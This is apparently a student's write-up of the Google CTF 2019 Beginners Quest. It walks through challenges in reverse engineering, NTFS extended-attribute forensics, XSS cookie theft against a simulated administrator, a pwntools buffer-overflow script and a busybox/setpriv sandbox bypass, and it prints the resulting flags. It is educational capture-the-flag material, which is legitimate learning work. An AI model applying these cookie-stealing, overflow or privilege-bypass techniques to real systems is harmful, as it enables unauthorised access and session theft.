# Google's Annual Cyber Security Contest

This is my write up, for the annual google cyber security 2019 beginners quest CTF. 

The Google CTF consists of two parts, firstly the Beginners area, which is intented for individuals, or small teams. Then there is the competitive area, which is intended for teams of 4-8 experienced players. 

These challenges start with general skill testing, on the easier side of the curvve, and quickly progress to a specialized and more rigourous challenges, demanding knowledge in particular fields. 

The contest provides challenges of the following 5 categories. 

Forensics, Networking, Binary Exploitation, Reverse Engineering, cryptography.

![ALT](/images/map.png)

# The first challenge Enter Space-Time Coordinates task misc

![ALT](/images/map1.PNG)



We are provided with a file, that upon opening, provides us with an executable,
and a log file.

The Log file contains name sand cordinates.

```ruby
0: AC+79 3888{6652492084280_198129318435598}
1: 
Pliamas Sos{276116074108949_243544040631356}
2: 
Ophiuchus{11230026071572_273089684340955}
3: 
Pax Memor -ne4456 Hi Pro{21455190336714_219250247519817}
4: 
Camion Gyrin{235962764372832_269519420054142}
```

The ELF file gives the following upon running.

```ruby
root@kali:~/Downloads/_Spacetime.extracted# ./rand2
Travel coordinator
0: AC+79 3888 - 193170523840521, 274297831258514
1: Pliamas Sos - 228671676158919, 238249522055273
2: Ophiuchus - 161795756869295, 10803893576473
3: Pax Memor -ne4456 Hi Pro - 120540714200543, 248117405179982
4: Camion Gyrin - 136214448104840, 26846690316000
5: CTF - <REDACTED>

Enter your destination's x coordinate:
>>> aaaaaaa
Enter your destination's y coordinate:
>>> Arrived somewhere, but not where the flag is. Sorry, try again.
```

It clearly is asking for cordinates, so lets first look at this program to better understand
what is going on.

Opening the file in Ghidra, shows several functions, and the flag is found in the main function.

```ruby
  printf("\nEnter your destination\'s x coordinate:\n>>> ");
  __isoc99_scanf(&DAT_00100b25,&local_28);
  printf("Enter your destination\'s y coordinate:\n>>> ");
  __isoc99_scanf(&DAT_00100b25,&local_30);
  lVar4 = next_destination();
  if (lVar4 == local_28) {
    lVar4 = next_destination();
    if (lVar4 == local_30) {
      puts("Arrived at the flag. Congrats, your flag is: CTF{welcome_to_googlectf}");
    }
  }
  puts("Arrived somewhere, but not where the flag is. Sorry, try again.");
  return 0;
}
```
# Satellite -  Networking

![ALT](/images/map2.png)



A zip file is provided, giving us two files, an ELF and a pdf.

The PDF is a photo of a satelite with the words `osmim`

![ALT](/images/osmium.png)

The ELF file, 

![ALT](/images/flag_satellite.PNG)

# Home Computer - FORENSICS

![ALT](/images/map3.png)

![ALT](/images/homecomputer.png)

We are provided with a single windows ntfs file, that we mount using the following

`sudo mount family.ntfs /mnt`

After an initial investigation, we come across this little clue in the file system.

under the `/mnt/Users/Family/Documents/credentials.txt`

```ruby
I keep pictures of my credentials in extended attributes.
```
In forensics, this is a cleaver and well known technique for hiding information and data.
We need to view these extended file attributes. 

Opening the files extndedd attributes, reveales large amountso f base64, and a .img header / footer.

After some research, I learned of a way to pip the extended attributes, into a file built as a .png.

```ruby
getfattr --only-values credentials.txt > flag.png
```

This gave us the following image.

```
CTF{congratsyoufoundmycreds}
```

# Government Agriculture Network - WEB

![ALT](/images/map4.PNG)


In this challenge, we are provided the following link.

https://govagriculture.web.ctfcompetition.com/

![ALT](/images/map4site.PNG)
This brings us to a page, that I immediately scan with google light house. 

![ALT](/images/map4vuln.PNG)

On the main page, if you enter any test into the post form, it provies this response.

```ruby
Your post was submitted for review. Administator will take a look shortly.
```

Initial attempts at a basic XSS alert script, did not work. So these our probably filtered.

In this instance, we know there is a javascript vulnerability and an administrator checking our posts. 
Some research into XSS vulnerbailities suggests this would be a DOM based XSS attack. 
A DOM based XSS attack, is a client side vulnerability, in which we modifie the DOM enviroment. 

A common goal with XSS attacks, is to steal a users cookies, inorder to be able
to login as that user without their password.  

The strategy here, to apply several XSS payloads, and test for a response.

Heading over to XSS hunter, we will select are payloads.

Because the alert script did not work, and we see several images, I am going to try 
an image oriented payload, designed to bypass script filter.

We then get this return feedback on XSS hunter.

```ruby
Cookies
flag=CTF{8aaa2f34b392b415601804c2f5f0f24e}; session=HWSuwX8784CmkQC1Vv0BXETjyXMtNQrV
```

# STOP GAN (bof) - PWN

![ALT](/images/map5.PNG)


We have a basic buffer overflow attack, lets download the file, and try connecting to the server.

Upon connecting, we are prompted with:

```ruby
root@kali:~/Downloads/_stopgan.extracted# nc buffer-overflow.ctfcompetition.com 1337
Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.
 Bonus flag for controlling the crash.

Console commands: 
run
quit
>>
```

Using pwntools, I scripted out the following;

```ruby 
  GNU nano 3.1                        stop.py                                   

from pwn import * 

p = remote("buffer-overflow.ctfcompetition.com", 1337)


p.recv()

p.sendline("run")

p.sendline("A"*500)

p.interactive()
```

Upong running this, we are provided with the following from the server;

```ruby
>>Inputs: run
CTF{Why_does_cauliflower_threaten_us}
Cauliflower systems never crash >>
segfault detected! ***CRASH***
Console commands: 
run
quit
>>$ 

```

# Bonus Flag

The bonus flag suggets we need to control the return address.  
Well,this program has no security, upon running check sec. 

This means if we can cause a buffer overflow, we can execute code on the stack. 

From here, we analyze the code in Ghidra nad found `local_flag` function.

So we can jump to this function. However, the function address does not work. 


Using searchmem, we set a breakpoint, run the program, and search memory to find the address of this function, 

we added 8 bytes of padding to the return address, and entered the payload. 

```ruby
CTF{controlled_crash_causes_conditional_correspondence}
```

# Work Computer - Sandbox

![ALT](/images/map6.PNG)

This Challenge require to connect via netcat to a server. 


Upon running ls -a we get,

```ruby
----------    1 1338     1338            33 Jul  1 00:30 ORME.flag
-r--------    1 1338     1338            28 Jul  1 00:30 README.flag
```

We need to access README.flag

We browse around, viewing everycommand in bin and sbin, and eventually find makemime. 

This file is able to read README.flag and outputs base 64, which decodes to CTF{4ll_D474_5h4ll_B3_Fr33}

# Bonus Flag

We need to access ORME.flag, which we have no permissions to. 

We try to use `busybox chmod` but the busy box suit of utilities is filtered. 

We find the function `setpriv`, and upon researching, it suggests 
it will run another command. 

Using this command 

```ruby 
> setpriv busybox chmod 777 ORME.flag
```
We get base 64 again, and it decodes to this

```ruby
CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}

```

# Cookie World Order - WEB

![ALT](/images/map7.PNG)

We are given a website, that takes us to a live stream of cauliflower, with a chatbox.

The first thing I do, is scan with google light house, which suggests a javascript vculnerability.

Here I enter an alert script into the chat box, and get a "HACKER ALERT". 

We use xss hunter, and input a payload for video tags. 

This is returned 

flag=CTF{3mbr4c3_the_c00k1e_w0r1d_ord3r}







